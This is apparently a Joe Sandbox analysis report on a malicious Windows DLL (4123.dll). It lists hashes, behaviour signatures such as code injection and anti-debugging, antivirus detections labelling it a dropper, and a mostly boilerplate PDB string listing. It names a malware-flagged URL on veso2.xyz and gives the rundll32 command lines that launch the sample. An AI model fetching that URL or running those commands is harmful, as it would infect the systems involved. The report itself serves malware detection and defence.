Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 4123.do1

Overview

General Information

Sample Name:4123.do1 (renamed file extension from do1 to dll)
Analysis ID:384021
MD5:f776deb4df137b37dcae5406c8f3a07a
SHA1:f6a31b594fca39c118927405fa4d14353b8fd49a
SHA256:93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Performs DNS queries to domains with low reputation
Rundll32 performs DNS lookup (likely malicious behavior)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
One or more processes crash
PE file contains strange resources
Uses 32bit PE files

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\4123.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 7100 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7132 cmdline: rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7120 cmdline: rundll32.exe C:\Users\user\Desktop\4123.dll,DF1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5752 cmdline: rundll32.exe 'C:\Users\user\Desktop\4123.dll',DF1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5948 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1008 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://veso2.xyz/campo/r/r1FAvira URL Cloud: Label: malware
Source: http://veso2.xyz/campo/r/r1C:Avira URL Cloud: Label: malware
Source: http://veso2.xyz/campo/r/r1Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: veso2.xyzVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: 4123.dllVirustotal: Detection: 55%Perma Link
Source: 4123.dllReversingLabs: Detection: 62%
Source: 10.2.rundll32.exe.1190000.7.unpackAvira: Label: TR/Dropper.Gen
Source: 3.2.rundll32.exe.11b0000.7.unpackAvira: Label: TR/Dropper.Gen
Source: 10.2.rundll32.exe.d823b6.2.unpackAvira: Label: TR/Dropper.Gen
Source: 4.2.rundll32.exe.11a0000.7.unpackAvira: Label: TR/Dropper.Gen
Source: 4123.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: Binary string: cryptbase.pdbP source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdbY source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb6 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.636727331.0000000002DD7000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642877334.00000000051BB000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637261679.0000000002DD1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb* source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb, source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdbS source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb_ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbq source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.637048796.0000000002DDD000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb} source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb& source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb? source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb} source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdb6 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbt source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbh source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdbc source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbB source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdbe source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdbe source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb? source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbh source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msvcp60.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.636944028.0000000003386000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.643200294.0000000003384000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbZ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb\ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbU source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb0 source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbW source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdbr source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb8 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbI source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: pnrpnsp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbq source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: lbase.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb{ source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdbS source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: WerFault.exe, 00000008.00000002.658372686.00000000035C0000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.656286484.00000000009C0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.698870871.0000000003430000.00000002.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.641954637.00000000059C4000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: combase.pdbD source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: combase.pdbF source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642363725.0000000000AB1000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb* source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbf source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: l32.pdb source: WerFault.exe, 00000009.00000003.636822779.0000000004A2D000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb5 source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdbN source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbr source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb` source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb, source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbG source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbe source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbx source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbc source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb5 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbf source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbY source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbL source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb~ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb, source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
